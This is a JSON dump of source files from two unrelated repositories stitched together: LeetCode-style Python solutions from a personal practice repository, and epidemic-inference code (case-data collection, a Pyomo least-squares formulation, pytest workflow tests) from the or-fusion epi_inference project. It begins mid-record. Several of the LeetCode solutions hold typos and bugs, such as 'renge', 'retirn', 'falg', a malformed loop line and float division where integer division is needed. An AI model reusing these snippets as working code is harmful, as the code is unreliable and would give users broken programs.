+ 1)\n\t\treturn sum(candy)\n\t\t" }, { "alpha_fraction": 0.8108108043670654, "alphanum_fraction": 0.8108108043670654, "avg_line_length": 17.5, "blob_id": "6e1d8e99e699637b8dde72a8556af8a2b03e4be5", "content_id": "cdf10a97874755ec86d62d5daa13e71d940697f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 37, "license_type": "no_license", "max_line_length": 20, "num_lines": 2, "path": "/README.md", "repo_name": "SreecharanG/Personal_Work", 
"src_encoding": "UTF-8", "text": "# Personal_Work\nUpdating Coding Part\n" }, { "alpha_fraction": 0.45614033937454224, "alphanum_fraction": 0.5, "avg_line_length": 16.384614944458008, "blob_id": "be359617babab1efebffbb665014dcd403fcb457", "content_id": "70017e2d8c7420a540e590e7c386d962ab43adc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 228, "license_type": "no_license", "max_line_length": 27, "num_lines": 13, "path": "/Part3/Pow(x,n).py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef myPow(self, x, n):\n\t\tflag = 1if n >= 0 else -1\n\t\tresult = 1\n\t\tn = abs(n)\n\t\twhile n > 0:\n\t\t\tif n & 1 == 1:\n\t\t\t\tresult *= x\n\t\t\tn >>= 1\n\t\t\tx *= x\n\t\tif flag < 0:\n\t\t\tresult = 1 / result\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5210843086242676, "alphanum_fraction": 0.5451807379722595, "avg_line_length": 22.428571701049805, "blob_id": "35bc685e73c96e388daf689b9189006e8975bdda", "content_id": "1804a18b888d299c6087ca257fb9fd093f402226", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "permissive", "max_line_length": 51, "num_lines": 14, "path": "/Part4/Sort_Colors.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef sortColors(self, nums):\n\t\tleft = mid = 0\n\t\tright = len(nums) - 1\n\t\twhile mid <= right:\n\t\t\tif nums[mid] == 0:\n\t\t\t\tnums[mid], nums[left] = nums[left], nums[mid]\n\t\t\t\tleft += 1\n\t\t\t\tmid += 1\n\t\t\telif nums[mid] == 1:\n\t\t\t\tmid += 1\n\t\t\telse:\n\t\t\t\tnums[mid], nums[right] = nums[right], nums[mid]\n\t\t\t\tright -= 1\n\t\t\t\t" }, { "alpha_fraction": 0.4609375, "alphanum_fraction": 0.546875, "avg_line_length": 14.8125, "blob_id": "21ff79a3065b7c1bdf465f167ecc1e02d85a70b3", "content_id": "d9f1dbd491c2155f6fda81f38dc845af43274234", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 256, "license_type": "no_license", "max_line_length": 32, "num_lines": 16, "path": "/Part3/Reverse_Integer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef reverse(self, x):\n\t\tflag = 0\n\t\tif x < 0:\n\t\t\tflag = -1\n\t\telse:\n\t\t\tfalg = 1\n\t\tx *= flag\n\t\tresult = 0\n\t\twhile x:\n\t\t\tresult = result * 10 + x % 10\n\t\t\tx /= 10\n\t\tif result > 2147483647:\n\t\t\treturn 0\n\t\telse:\n\t\t\treturn result * flag\n\t\t\t" }, { "alpha_fraction": 0.6368715167045593, "alphanum_fraction": 0.6480447053909302, "avg_line_length": 22.733333587646484, "blob_id": "8cec1c06ea524af42e77cacdb5ec2afb3cfefc10", "content_id": "9070255361f19ef3cf0269db84f60725247fe2de", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 358, "license_type": "permissive", "max_line_length": 76, "num_lines": 15, "path": "/Part4/Sum_Root_To_LEaf_Numbers.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef sumNumbers(self, root):\n\t\treturn self._sumNumbers(root, 0)\n\n\tdef _sumNumbers(self, root, s):\n\t\tif root is None:\n\t\t\treturn 0\n\t\ts = s* 10 + root.val\n\t\treturn sum([self._sumNumbers(r, s) for r in (root.left, root.right)]) or s\n\t\t" }, { 
"alpha_fraction": 0.5456919074058533, "alphanum_fraction": 0.5691906213760376, "avg_line_length": 23, "blob_id": "c333c06b2dcf0590c2031ca6a10ff4cd0d5dfc6d", "content_id": "887f0c6fc08a17a9246b6e1ad8a03c53bd7a70ee", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "permissive", "max_line_length": 71, "num_lines": 16, "path": "/Part4/Unique_Paths.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "import math\nclass Solution(object):\n\tdef uniquePaths(self, m, n):\n\t\tm -= 1\n\t\tn -= 1\n\t\treturn math.factorial(m + n)/ (math.factorial(n) * math.factorial(m))\n\n\n\nclass _Solution(object):\n\tdef _uniquePaths(self, m, n):\n\t\tdp = [[1 for __ in range(n)] for __ in range(m)] \n\t\tfor i in range(1, n):\n\t\t\tdoe j in range(1, m):\n\t\t\tdp[j][i] = dp[j - 1][i] + dp[j][i - 1]\n\t\treturn dp[m - 1][n - 1]" }, { "alpha_fraction": 0.6329966187477112, "alphanum_fraction": 0.6447811722755432, "avg_line_length": 30.3157901763916, "blob_id": "07eac563603c5d42414685b2220d8c2531e2982f", "content_id": "45bfb911b8ff38ac873501da25e0e6df9c6b140c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 594, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/Part2/Best_Time_To_Buy_And_Sell_Stock_3.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Subject(object):\n\tdef maxProfit(self, prices):\n\t\ttotal_max_profit = 0\n\t\tn = len(prices)\n\t\tfirst_profits = [0] * n\n\t\tmin_price = float('inf')\n\n\t\tfor i in range(n):\n\t\t\tmin_price = min(min_price, prices[i])\n\t\t\ttotal_max_profit = max(total_max_profit, prices[i] - min_price)\n\t\t\tfirst_profits[i] = total_max_profit\n\n\t\tmax_profit = 0\n\t\tmax_price = float('-inf')\n\t\tfor i in range(n - 1, 0, -1):\n\t\t\tmax_price = max(max_price, prices[i])\n\t\t\tmax_profit = max(max_profit, max_price - prices[i])\n\t\t\ttotal_max_profit = max(total_max_profit, max_profit + first_profits[i - 1])\n\t\treturn total_max_profit" }, { "alpha_fraction": 0.5951219797134399, "alphanum_fraction": 0.6146341562271118, "avg_line_length": 24.375, "blob_id": "a192dec2f2ddf334b5b0bcc54f4f2dee5695edcd", "content_id": "76d19199d5f1fb67be9cc61d9e4a2fab91a3a818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/Part1/Remove_Duplicates_From_Sorted_Array_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef removeDuplicates(self, nums):\n\t\tcount = 0\n\t\tfor i in renge(len(nums)):\n\t\t\tif count < 2 or nums[count - 2] != nums[i]:\n\t\t\t\tnums[count] = nums[i]\n\t\t\t\tcount += 1\n\t\treturn count\n\t\t" }, { "alpha_fraction": 0.4272445738315582, "alphanum_fraction": 0.49226006865501404, "avg_line_length": 28.454545974731445, "blob_id": "65adebdb912ba57e39e849964d48a3e7f9b39256", "content_id": "eaee6dc32f9df90e182925d4c430e8a9996299b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 323, "license_type": "no_license", "max_line_length": 74, "num_lines": 11, "path": "/Part3/Roman_To_Integer.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef romanToInt(self, s):\n\t\tmap = {\"M\" : 1000, \"D\": 500, \"C\": 100, \"L\": 50, 
\"X\": 10, \"V\": 5, \"I\": 1}\n\t\tresult = 0\n\t\tfor i in range(len(s)):\n\t\t\tif i > 0 and map[s[i]] > map[s[i - 1]]:\n\t\t\t\tresult -= map[s[i - 1]]\n\t\t\t\tresult += map[s[i]] - map[s[i - 1]]\n\t\t\telse:\n\t\t\t\tresult += map[s[i]]\n\t\treturn result" }, { "alpha_fraction": 0.5596708059310913, "alphanum_fraction": 0.5802469253540039, "avg_line_length": 23.100000381469727, "blob_id": "988ac6aa8a16cc9e95f802339f3630158e424ed8", "content_id": "27d0b1dc91dee0e39c3b2ac1022753e46958c672", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/Part2/Length_Of_Last_Word.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef lengthofLastWord(self, s):\n\t\tlength = len(s)\n\t\tindex = length - 1\n\t\twhile index >= 0 and s[index] == \" \":\n\t\t\tindex -= 1\n\t\ttemp = index\n\t\twhile index >= 0 and s[index] != \" \":\n\t\t\tindex -= 1\n\t\treturn temp - index\n\t\t" }, { "alpha_fraction": 0.5420875549316406, "alphanum_fraction": 0.5656565427780151, "avg_line_length": 20.285715103149414, "blob_id": "f47a3dfd148437cff20c89c00dfbd619bb3216ba", "content_id": "45de7eb145487a8627eb32f7905c36941e341e1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/Part1/Rotate_Array.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef rotate(self, nums, k):\n\n\t\tdef reverse(nums,start, end):\n\t\t\twhile start <end:\n\t\t\t\tnums[start], nums[end] = nums[end], nums[start]\n\t\t\t\tstart += 1\n\t\t\t\tend -= 1\n\n\t\tn = len(nums)\n\t\tk %= n\n\t\treverse(nums, 0, n - k - 1)\n\t\treverse(nums, n - k, n - 1)\n\t\treverse(nums, 0, n - 1)" }, { "alpha_fraction": 0.5733944773674011, "alphanum_fraction": 0.5917431116104126, "avg_line_length": 17, "blob_id": "6699e9af79c8ce73c973b26187b9cdd3c7eb9771", "content_id": "098cc5b1fee19e2455fd3c32d0ad5911b33a69bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 218, "license_type": "no_license", "max_line_length": 33, "num_lines": 12, "path": "/Part1/Majority_Element.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef majorityElement(self, nums):\n\t\tresult = None\n\t\tcount = 0\n\t\tfor num in nums:\n\t\t\tif count == 0:\n\t\t\t\tresult = num\n\t\t\tif result == num:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tcount -= 1\n\t\tretirn result\n\t\t" }, { "alpha_fraction": 0.5414141416549683, "alphanum_fraction": 0.5696969628334045, "avg_line_length": 23.649999618530273, "blob_id": "04160fd43fcf4a1cccde848fb04879937942c53b", "content_id": "bdee5b8fd5f26e3ef82dfd768146de0de66eefaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 495, "license_type": "no_license", "max_line_length": 55, "num_lines": 20, "path": "/Part2/Maxmial_Rectangle.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef maximalRectangel(self, matrix):\n\t\tif not matrix or not matrix[0]:\n\t\t\treturn 0\n\n\t\tn = len(matrix[0])\n\t\theights = [0 for __ in range(n + 1)]\n\t\tresult = 0\n\t\tfor row in matrix:\n\t\t\tfor i in range(n):\n\t\t\t\theights[i] = heights[i] + 1 if row[i] == 
'1' else 0\n\t\t\tstack = [-1]\n\t\t\tfor i in range(n + 1):\n\t\t\t\twhile heights[i] < heights[stack[-1]]:\n\t\t\t\t\th = heights[stack.pop()]\n\t\t\t\t\tw = i - stack[-1] - 1\n\t\t\t\t\tresult = max(result, h * w)\n\n\t\t\t\tstack.append(i)\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6433120965957642, "alphanum_fraction": 0.6433120965957642, "avg_line_length": 24.83333396911621, "blob_id": "6d840ad6f15af08bae59eeceb0549c3bb57355fa", "content_id": "0d6837d298e583120d4f214df015904cd1f5ec11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 45, "num_lines": 6, "path": "/Part2/Subsets.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef subsets(self, nums):\n\t\tresult = [[]]\n\t\tfor num in sorted(nums):\n\t\t\tresult += [item +[num] for item in result]\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.6180811524391174, "alphanum_fraction": 0.6217712163925171, "avg_line_length": 19.769229888916016, "blob_id": "440bd380979c706f8a4ecd21f3229c0639492727", "content_id": "9a2f9855d92993e6c90e9a87e5ac761387192732", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 542, "license_type": "no_license", "max_line_length": 70, "num_lines": 26, "path": "/Part1/Reverse_Linked_List_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\n\tdef to_list(self):\n\t\treturn [self.val] + self.next.to_list() if self.next else [self.val]\n\nclass Solution(object):\n\tdef reverseBetween(self, head, m, n):\n\t\tdummy = ListNode(-1)\n\t\tdummy.next = head\n\t\tnode = dummy\n\t\tfor __ in range(m - 1):\n\t\t\tnode = node.next\n\n\t\tprev = node.next\n\t\tcurr = prev.next\n\t\tfor __ in range(n - m):\n\t\t\tnext = curr.next\n\t\t\tcurr.next = prev\n\t\t\tprev = curr\n\t\t\tcurr = next\n\t\tnode.next.next = curr\n\t\tnode.next = prev\n\t\treturn dummy.next\n\t\t" } ]
103
or-fusion/epi_inference
https://github.com/or-fusion/epi_inference
b6192f1b6e7687da22983dc955d890703e622684
d3c691960ffae74ef998050efe1dbd70f22e39f3
5485155698e9b016a55ae2c6d78e659ee9e8231f
refs/heads/master
2023-08-31T22:22:54.480859
2020-07-27T14:33:24
2020-07-27T14:33:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.596528172492981, "alphanum_fraction": 0.5970541834831238, "avg_line_length": 32.33333206176758, "blob_id": "872bb5fe7534b8f33c03a420f774c60ef887b886", "content_id": "340d71ea81a72ad7a5488333dc3d0ad55db359a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1901, "license_type": "no_license", "max_line_length": 157, "num_lines": 57, "path": "/epi_inference/collect/casedata_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport pandas as pd\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom .load_results import load_df_casedata\nfrom .misc import save_collect\n\n\ndef run(CONFIG, warnings):\n #\n # Process county case data. We assume that data is organized within\n # a single directory, where each CSV file reports case data for a single\n # county. See the epi_inference/examples/countydata directory structure for\n # an example.\n #\n df = load_df_casedata(CONFIG[\"files\"],\n datadir=CONFIG[\"dir\"],\n datacol=CONFIG.get(\"column\", None),\n days_before_first=CONFIG.get(\"days_before_first\", None),\n days_after_first=CONFIG.get(\"days_after_first\",None))\n\n if df is None: # pragma: no cover\n print(\"ERROR: no case data loaded\")\n sys.exit(1)\n if CONFIG['verbose']:\n print(\"Data Summary\")\n print(df)\n print(\"\")\n\n save_collect(CONFIG['output'], df, CONFIG['verbose'], warnings)\n save_metadata(CONFIG, warnings)\n\n\nclass CollectCaseData(Task):\n\n def __init__(self):\n Task.__init__(self, \"casedata\",\n \"Collect case data into a single CSV file for reconstruction and inference.\")\n\n def validate(self, CONFIG):\n valid_options = set(['files', 'dir', 'column', 'days_before_first', 'days_after_first', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run(CONFIG, self._warnings)\n\n\nregister_task(CollectCaseData())\n\n" }, { "alpha_fraction": 0.6175838708877563, "alphanum_fraction": 0.6255255341529846, "avg_line_length": 39.6920166015625, "blob_id": "e7d5c710d1e180e84d485ea2cf458f4a1a1065a5", "content_id": "f6c40b0bad8bdf81b07266d88c9545c3ae3ad7f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10703, "license_type": "no_license", "max_line_length": 220, "num_lines": 263, "path": "/epi_inference/formulations/attic/multinode_mobility_time_varying_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom . 
import reconstruction as recon\nimport pyutilib.misc.timing as timing\nimport json\nimport matplotlib.pyplot as plt\n\ndef run_multinode_mobility_time_varying_decay_lsq(cm_rep_cases, populations, mobility, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n for i in [-1]: #range(-6,2):\n # create the Pyomo optimization formulation\n regu = 1*10**i\n m = create_inference_regu_formulation(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n mobility=mobility,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n delta_beta_regu=regu,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=True) #verbose)\n m.display()\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = dict()\n results['date'] = [m.DATES[t] for t in m.TIMES]\n for i in m.NODES:\n betas = list()\n transmissions = 0\n for t in m.TIMES:\n transmissions += m.T_data[i][t]\n if transmissions < 20:\n betas.append(None)\n else:\n betas.append(pe.value(m.beta[i,t]))\n results[i] = betas\n\n df = pd.DataFrame(results)\n print(df)\n pd.set_option('display.max_rows', None)\n print(df.std())\n df.plot(x='date')\n plt.show()\n\n return {'results': results}\n\n \"\"\" OLD RESULTS STRUCTURE\n # build the dictionary of results\n betas = list()\n wdates = list()\n status = list()\n fips = list()\n pops = list()\n est_transmissions = list()\n window_days = list()\n for i in m.NODES:\n for w in m.WINDOWS:\n wdates.append(m.DATES[w])\n fips.append(i)\n pops.append(populations[i])\n est_transmissions.append(m.window_transmissions[i][w])\n window_days.append(m.window_days)\n if m.beta[i,w].stale == True or m.window_transmissions[i][w] <= 
2:\n status.append('invalid_insufficient_data')\n betas.append(None)\n else:\n status.append('ok')\n betas.append(value(m.beta[i,w])) \n\n ret = {'dates': wdates, 'est_beta':betas, 'status':status, 'population': pops, 'est_transmissions':est_transmissions, 'window_days': window_days, 'FIPS':fips}\n #df = pd.DataFrame(ret)\n #df.to_csv('foo.csv')\n return ret\n \"\"\"\n\ndef create_inference_regu_formulation(Cdates, cumulative_reported_cases, populations, mobility, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, delta_beta_regu, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). 
If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n if len(analysis_window) != 0:\n raise NotImplementedError('analysis_window is not yet implemented for multinode_decay_lsq')\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.eta = 0.5 # fraction of the day spent \"away\"\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n model.delta_beta_regu = delta_beta_regu\n\n #model.NODES = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n model.NODES = pe.Set(initialize=list(k for k in cumulative_reported_cases.keys()))\n\n model.mobility = dict(mobility)\n model.MOBILITY_TUPLES = list()\n #model.mobility = dict()\n for i in model.NODES:\n if i not in model.mobility:\n model.mobility[i] = {}\n for j in model.mobility[i]:\n if i in model.NODES and j in model.NODES:\n model.MOBILITY_TUPLES.append((i,j))\n model.populations = dict()\n \n model.T_data = dict()\n model.I_data = dict()\n model.S_data = dict()\n for nodeid in model.NODES:\n model.populations[nodeid] = float(populations[nodeid]) # overall population\n cm_rep_cases_node = [v for v in cumulative_reported_cases[nodeid].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=model.populations[nodeid],\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n model.T_data[nodeid] = T\n model.I_data[nodeid] = dict()\n model.I_data[nodeid]['I1'] = I1\n model.I_data[nodeid]['I2'] = I2\n model.I_data[nodeid]['I3'] = I3\n model.S_data[nodeid] = S\n \n if not hasattr(model, 'TIMES'):\n model.TIMES = pe.Set(initialize=[i for i in range(len(T))], ordered=True)\n if not hasattr(model, 'DATES'):\n model.DATES = dates\n\n model.beta = pe.Var(model.NODES, model.TIMES, initialize=1.0, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n # define the variable for estimated transmissions\n model.T_hat = pe.Var(model.NODES, model.TIMES, initialize=1.0)\n # infection process\n def _infection_process(m, i, t):\n percent_mobile = 0\n if i in m.mobility:\n percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i] if j in m.NODES)\n\n return m.T_hat[i,t] == m.beta[i,t] * (m.I_data[i]['I1'][t] + m.I_data[i]['I2'][t] + m.I_data[i]['I3'][t]) / m.populations[i] * m.S_data[i][t] * (1-m.eta*percent_mobile) \\\n + sum(m.beta[j,t] * (m.I_data[j]['I1'][t] + m.I_data[j]['I2'][t] + m.I_data[j]['I3'][t]) / m.populations[j] * m.S_data[i][t] * (m.eta*m.mobility[i][j]/m.populations[i]) for j in m.mobility[i] if j in m.NODES)\n\n model.infection_process = pe.Constraint(model.NODES, model.TIMES, rule=_infection_process)\n\n model.delta_beta = pe.Var(model.NODES, model.TIMES, initialize=0)\n def _delta_beta_con(m, i, t):\n if t == m.TIMES.first():\n return pe.Constraint.Skip\n return m.delta_beta[i,t] == m.beta[i,t] - m.beta[i,t-1]\n model.delta_beta_con = pe.Constraint(model.NODES, model.TIMES, rule=_delta_beta_con)\n\n # least squares objective function\n def _lse(m):\n return sum( (m.T_hat[i,t] - m.T_data[i][t])**2 for i in m.NODES for t in m.TIMES)\n model.lse = pe.Expression(rule=_lse)\n\n def _regu(m):\n return sum(m.delta_beta[i,t]**2 for i in m.NODES for t in m.TIMES)\n model.regu = pe.Expression(rule=_regu)\n \n def 
_total_lse(m):\n return m.lse + m.delta_beta_regu * m.regu\n model.total_lse = pe.Objective(rule=_total_lse)\n\n return model\n\n" }, { "alpha_fraction": 0.6912838220596313, "alphanum_fraction": 0.7129669189453125, "avg_line_length": 55.10843276977539, "blob_id": "54a21b507eeadef5b86d3f2ded6e9c7d1695b79b", "content_id": "f41c980703637becf1b71fe08cf9dfa734f27d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4658, "license_type": "no_license", "max_line_length": 188, "num_lines": 83, "path": "/epi_inference/formulations/tests/test_inference_workflows.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport shutil\n\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\nfrom epi_inference.engine import driver\nfrom epi_inference.util import compare_json\n\ntry:\n import poek\n poek_available=True\nexcept:\n poek_available=False\n\nclass TestInference():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_mobility_window(self):\n args = Options()\n args.block = 'mobility_windows'\n args.config_file = './config_files/tests1.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the json files match their baselines\n compare_json('./output/tests1_inference_unsampled_countydata1_all.json', './baseline/tests1_inference_unsampled_countydata1_all.json')\n\n compare_json('./output/tests1_inference_unsampled_countydata1_all_new.json', './baseline/tests1_inference_unsampled_countydata1_all.json')\n compare_json('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all.json',\n abs_tol=1e-3, skip_keys=['days_since_first_reported', 'reported_cases_over_window', 'infectious_pop_over_window', 'transmissions_over_window'])\n compare_json('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json', abs_tol=1e-3)\n \n # cleanup the files we created\n os.remove('./output/tests1_inference_unsampled_countydata1_all.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_new.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_new_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_pyomo_iterative_meta.yml')\n\n @pytest.mark.skip('Skipping test because \"poek\" is not installed.')\n def test_mobility_window_poek(self):\n args = Options()\n args.block = 'mobility_windows_poek'\n\n # check that the json files match their baselines\n compare_json('./output/tests1_inference_unsampled_countydata1_all_poek.json', './baseline/tests1_inference_unsampled_countydata1_all.json')\n\n # cleanup the files we created\n os.remove('./output/tests1_inference_unsampled_countydata1_all_poek.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_poek_meta.yml')\n\n def test_select_mobility_window(self):\n # run a collection of data for 24031\n args = Options()\n args.block = 'select_mobility_windows'\n args.config_file = './config_files/tests1.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the 
csv files load into dataframes that have the correct numbers and shapes\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_last.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last.json')\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_20200404.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last.json')\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last.json',\n abs_tol=1e-3, skip_keys=['days_since_first_reported', 'reported_cases_over_window', 'infectious_pop_over_window', 'transmissions_over_window'])\n compare_json('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative.json', './baseline/tests1_inference_unsampled_countydata1_all_select_last_iterative.json')\n \n # cleanup the files we created\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_20200404.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_20200404_meta.yml')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative.json')\n os.remove('./output/tests1_inference_unsampled_countydata1_all_select_last_iterative_meta.yml')\n\n" }, { "alpha_fraction": 0.6065062284469604, "alphanum_fraction": 0.6100713014602661, "avg_line_length": 29.72602653503418, "blob_id": 